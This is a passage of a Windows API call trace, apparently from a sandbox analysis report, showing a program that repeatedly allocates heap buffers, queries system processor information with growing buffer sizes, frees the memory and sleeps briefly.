0x295d900 [0249.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.435] Sleep (dwMilliseconds=0x110) [0249.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0249.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0249.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0249.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0249.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0249.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0249.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0249.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0249.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.458] Sleep (dwMilliseconds=0x110) [0249.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0249.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0249.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0249.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0249.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0249.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0249.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0249.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0249.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.474] Sleep (dwMilliseconds=0x110) [0249.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0249.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0249.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0249.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0249.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0249.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0249.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0249.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0249.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.486] Sleep (dwMilliseconds=0x110) [0249.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0249.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0249.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0249.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0249.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0249.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0249.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0249.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0249.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.502] Sleep (dwMilliseconds=0x110) [0249.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0249.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0249.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0249.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0249.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0249.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0249.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0249.521] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0249.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.522] Sleep (dwMilliseconds=0x110) [0249.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0249.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0249.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0249.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0249.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0249.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0249.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0249.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0249.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.535] Sleep (dwMilliseconds=0x110) [0249.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0249.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0249.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0249.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0249.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0249.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0249.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0249.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0249.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.551] Sleep (dwMilliseconds=0x110) [0249.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0249.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0249.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0249.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0249.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0249.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0249.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0249.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0249.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.567] Sleep (dwMilliseconds=0x110) [0249.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0249.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0249.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0249.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0249.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0249.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0249.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0249.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0249.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.582] Sleep (dwMilliseconds=0x110) [0249.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0249.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0249.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0249.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0249.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0249.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0249.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0249.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0249.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.596] Sleep (dwMilliseconds=0x110) [0249.632] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0249.632] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.632] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0249.632] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0249.632] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.633] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0249.636] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0249.636] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.636] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0249.636] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0249.636] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.637] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0249.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.638] Sleep (dwMilliseconds=0x110) [0249.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0249.661] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0249.662] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0249.662] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0249.662] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0249.662] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.663] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0249.663] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0249.663] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.663] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0249.663] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.664] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.664] Sleep (dwMilliseconds=0x110) [0249.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0249.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0249.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0249.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0249.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0249.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0249.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0249.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0249.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.673] Sleep (dwMilliseconds=0x110) [0249.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0249.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0249.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0249.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0249.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0249.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0249.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0249.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 